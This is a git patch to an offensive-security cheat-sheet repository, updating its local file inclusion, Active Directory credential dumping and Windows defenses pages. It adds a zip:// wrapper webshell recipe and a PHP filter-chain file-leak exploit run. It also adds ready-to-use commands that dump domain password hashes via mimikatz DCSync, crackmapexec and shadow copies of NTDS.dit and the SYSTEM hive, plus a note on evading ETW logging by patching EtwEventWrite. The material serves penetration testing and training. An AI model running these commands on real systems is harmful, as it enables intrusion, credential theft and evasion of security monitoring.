From fddd094ee191cd7262deec53dfb004b45ed1e2d6 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 27 Mar 2023 22:38:25 +0200 Subject: [PATCH] LFI iconv and dechunk + ETW + NTDS Dump Rework --- File Inclusion/README.md | 55 ++++++-- .../Active Directory Attack.md | 129 +++++------------- .../Windows - Defenses.md | 21 ++- 3 files changed, 92 insertions(+), 113 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 70676a2..972637e 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -21,11 +21,12 @@ - [Bypass allow_url_include](#bypass-allow_url_include) - [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) - [Wrapper php://filter](#wrapper-phpfilter) - - [Wrapper zip://](#wrapper-zip) - [Wrapper data://](#wrapper-data) - [Wrapper expect://](#wrapper-expect) - [Wrapper input://](#wrapper-input) + - [Wrapper zip://](#wrapper-zip) - [Wrapper phar://](#wrapper-phar) + - [Wrapper iconv:// and dechunk://](#wrapper-iconv-and-dechunk) - [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) - [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) - [LFI to RCE via upload](#lfi-to-rce-via-upload) @@ -173,18 +174,6 @@ Also there is a way to turn the `php://filter` into a full RCE. ``` -### Wrapper zip:// - -1. Create an evil payload: `echo "
" > payload.php;` -2. Zip the file - ```python - zip payload.zip payload.php; - mv payload.zip shell.jpg; - rm payload.php - ``` -3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php - - ### Wrapper data:// ```powershell @@ -217,6 +206,17 @@ Alternatively, Kadimus has a module to automate this attack. ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input ``` +### Wrapper zip:// + +1. Create an evil payload: `echo "" > payload.php;` +2. Zip the file + ```python + zip payload.zip payload.php; + mv payload.zip shell.jpg; + rm payload.php + ``` +3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php + ### Wrapper phar:// @@ -252,6 +252,32 @@ include('phar://test.phar'); NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. +### Wrapper iconv:// and dechunk:// + +The goal is to leak the content of a file, one character at a time. + +**Requirements**: +- Backend must not use `file_exists` or `is_file`. +- Vulnerable parameter should be in a `POST` request. + - You can't leak more than 135 characters in a GET request due to the size limit + +The exploit chain is based on PHP filters: `iconv` and `dechunk`: + +1. Use the `iconv` filter with an encoding increasing the data size exponentially to trigger a memory error. +2. Use the `dechunk` filter to determine the first character of the file, based on the previous error. +3. Use the `iconv` filter again with encodings having different bytes ordering to swap remaining characters with the first one. + +Exploit using [synacktiv/php_filter_chains_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit), the script will use either the `HTTP status code: 500` or the time as an error-based oracle to determine the character. + +```ps1 +$ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0 +[*] The following URL is targeted : http://127.0.0.1 +[*] The following local file is leaked : /test +[*] Running POST requests +[+] File /test leak is finished! +``` + + ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) @@ -483,4 +509,5 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa * [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376) * [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters) * [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) -* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html) \ No newline at end of file +* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html) +* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 704e89e..9ed6b9d 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -30,14 +30,9 @@ - [Abuse GPO with PowerView](#abuse-gpo-with-powerview) - [Abuse GPO with StandIn](#abuse-gpo-with-standin) - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials) - - [Using ndtsutil](#using-ndtsutil) - - [Using Vshadow](#using-vshadow) - - [Using vssadmin](#using-vssadmin) - - [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary) - - [Using esentutl.exe](#using-esentutlexe) + - [DCSync Attack](#dcsync-attack) + - [Volume Shadow Copy](#volume-shadow-copy) - [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit) - - [Alternatives - modules](#alternatives---modules) - - [Using Mimikatz DCSync](#using-mimikatz-dcsync) - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) - [NTDS Reversible Encryption](#ntds-reversible-encryption) @@ -1259,72 +1254,44 @@ However you can change the location to a custom one, you will need to query the reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" ``` -### Using ndtsutil +### DCSync Attack -```powershell -C:\>ntdsutil -ntdsutil: activate instance ntds -ntdsutil: ifm -ifm: create full c:\pentest -ifm: quit -ntdsutil: quit -``` +DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. -or +* DCSync only one user + ```powershell + mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt + ``` +* DCSync all users of the domain + ```powershell + mimikatz# lsadump::dcsync /domain:htb.local /all /csv -```powershell -ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q -``` + crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds + crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi + ``` -### Using Vshadow +> :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. -```powershell -vssadmin create shadow /for=C : -Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit -``` -You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) +### Volume Shadow Copy -```powershell -Import-Module .\Copy-VSS.ps1 -Copy-VSS -Copy-VSS -DestinationDir C:\ShadowCopy\ -``` +The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process. -### Using vssadmin +* [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin) + ```powershell + vssadmin create shadow /for=C: + copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy + copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy + ``` +* [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files) + ```powershell + ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q + ``` +* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) + ```powershell + cme smb 10.10.0.202 -u username -p password --ntds vss + ``` -```powershell -vssadmin create shadow /for=C: -copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy -copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy -``` - -### Using DiskShadow (a Windows signed binary) - -```powershell -diskshadow.txt contains : -set context persistent nowriters -add volume c: alias someAlias -create -expose %someAlias% z: -exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit -delete shadows volume %someAlias% -reset - -then: -NOTE - must be executed from C:\Windows\System32 -diskshadow.exe /s c:\diskshadow.txt -dir c:\exfil -reg.exe save hklm\system c:\exfil\system.bak -``` - -### Using esentutl.exe - -Copy/extract a locked file such as the AD Database - -```powershell -esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit -``` ### Extract hashes from ntds.dit @@ -1344,40 +1311,6 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL * `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. * `-user-status`: Display whether or not the user is disabled. -### Alternatives - modules - -Metasploit modules - -```c -windows/gather/credentials/domain_hashdump -``` - -PowerSploit module - -```powershell -Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit -``` - -CrackMapExec module - -```powershell -cme smb 10.10.0.202 -u username -p password --ntds vss -cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default -``` - -### Using Mimikatz DCSync - -Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. - -```powershell -# DCSync only one user -mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt - -# DCSync all users of the domain -mimikatz# lsadump::dcsync /domain:htb.local /all /csv -``` - -:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. ### Using Mimikatz sekurlsa diff --git a/Methodology and Resources/Windows - Defenses.md b/Methodology and Resources/Windows - Defenses.md index d54861c..aa7ade7 100644 --- a/Methodology and Resources/Windows - Defenses.md +++ b/Methodology and Resources/Windows - Defenses.md @@ -11,6 +11,7 @@ * [Script Block Logging](#script-block-logging) * [Protected Process Light](#protected-process-light) * [Credential Guard](#credential-guard) +* [Event Tracing for Windows](#event-tracing-for-windows) * [Windows Defender Antivirus](#windows-defender-antivirus) * [Windows Defender Application Control](#windows-defender-application-control) * [Windows Defender Firewall](#windows-defender-firewall) @@ -180,6 +181,22 @@ When Credential Guard is enabled, it uses hardware-based virtualization to creat Credential Guard uses a combination of hardware-based virtualization and the Trusted Platform Module (TPM) to ensure that the secure kernel is trusted and secure. It can be enabled on devices that have a compatible processor and TPM version, and require a UEFI firmware that supports the necessary features. +## Event Tracing for Windows + +ETW (Event Tracing for Windows) is a Windows-based logging mechanism that provides a way to collect and analyze system events and performance data in real-time. ETW allows developers and system administrators to gather detailed information about system performance and behavior, which can be used for troubleshooting, optimization, and security purposes. + +| Name | GUID | +|---------------------------------------|----------------------------------------| +| Microsoft-Antimalware-Scan-Interface | {2A576B87-09A7-520E-C21A-4942F0271D67} | +| Microsoft-Windows-PowerShell | {A0C1853B-5C40-4B15-8766-3CF1C58F985A} | +| Microsoft-Antimalware-Protection | {E4B70372-261F-4C54-8FA6-A5A7914D73DA} | +| Microsoft-Windows-Threat-Intelligence | {F4E1897C-BB5D-5668-F1D8-040F4D8DD344} | + +The `Microsoft-Windows-Threat-Intelligence` provider corresponds to ETWTI, an additional security feature that an EDR can subscribe to and identify malicious uses of APIs (e.g. process injection). + +The most common bypassing technique is patching the function `EtwEventWrite` which is called to write/log ETW events. + + ## Windows Defender Antivirus Also known as `Microsoft Defender`. @@ -283,4 +300,6 @@ The **Enterprise Context** column shows you what each app can do with your enter * [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3) * [Do You Really Know About LSA Protection (RunAsPPL)? - itm4n - Apr 7, 2021](https://itm4n.github.io/lsass-runasppl/) * [Determine the Enterprise Context of an app running in Windows Information Protection (WIP) - 03/10/2023 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/wip-app-enterprise-context) -* [Create and verify an Encrypting File System (EFS) Data Recovery Agent (DRA) certificate - 12/09/2022 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/create-and-verify-an-efs-dra-certificate) \ No newline at end of file +* [Create and verify an Encrypting File System (EFS) Data Recovery Agent (DRA) certificate - 12/09/2022 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/create-and-verify-an-efs-dra-certificate) +* [DISABLING AV WITH PROCESS SUSPENSION - March 24, 2023 - By Christopher Paschen ](https://www.trustedsec.com/blog/disabling-av-with-process-suspension/) +* [Disabling Event Tracing For Windows - UNPROTECT PROJECT - Tuesday 19 April 2022](https://unprotect.it/technique/disabling-event-tracing-for-windows-etw/) \ No newline at end of file